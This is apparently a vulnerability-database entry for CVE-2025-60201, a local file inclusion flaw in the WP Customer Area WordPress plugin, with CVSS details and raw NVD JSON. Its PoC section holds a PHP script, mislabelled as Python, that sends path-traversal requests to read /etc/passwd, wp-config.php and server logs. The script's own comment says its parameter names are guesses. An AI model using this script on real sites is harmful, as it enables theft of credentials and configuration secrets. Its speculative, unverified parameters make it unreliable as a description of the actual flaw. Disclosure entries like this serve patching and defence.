Security Vulnerability Report
中文
CVE-2025-60201 CVSS 7.5 HIGH

CVE-2025-60201

Published: 2025-11-06 16:16:06
Last Modified: 2026-04-27 16:16:33

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in aguilatechnologies WP Customer Area customer-area allows PHP Local File Inclusion.This issue affects WP Customer Area: from n/a through <= 8.3.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Customer Area <= 8.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-60201 PoC - WP Customer Area LFI // Target: WordPress site with WP Customer Area plugin <= 8.3.5 $target = "http://target-site.com"; $wp_path = "/wp-content/plugins/customer-area/src/"; // Vulnerable parameter examples (actual parameter names need enumeration) $vuln_params = [ "?page_id=1&cuar_action=include&file=../../../../../../etc/passwd", "?cuar_page=account&file=../../../../../../wp-config.php", "/?p=1&template=../../../../../../var/log/apache2/access.log" ]; foreach ($vuln_params as $param) { $url = $target . $wp_path . $param; echo "[*] Testing: $url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strpos($response, "root:") !== false) { echo "[+] LFI Confirmed! Sensitive data leaked.\n"; break; } } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60201", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:05.570", "lastModified": "2026-04-27T16:16:33.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in aguilatechnologies WP Customer Area customer-area allows PHP Local File Inclusion.This issue affects WP Customer Area: from n/a through <= 8.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/customer-area/vulnerability/wordpress-wp-customer-area-plugin-8-2-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}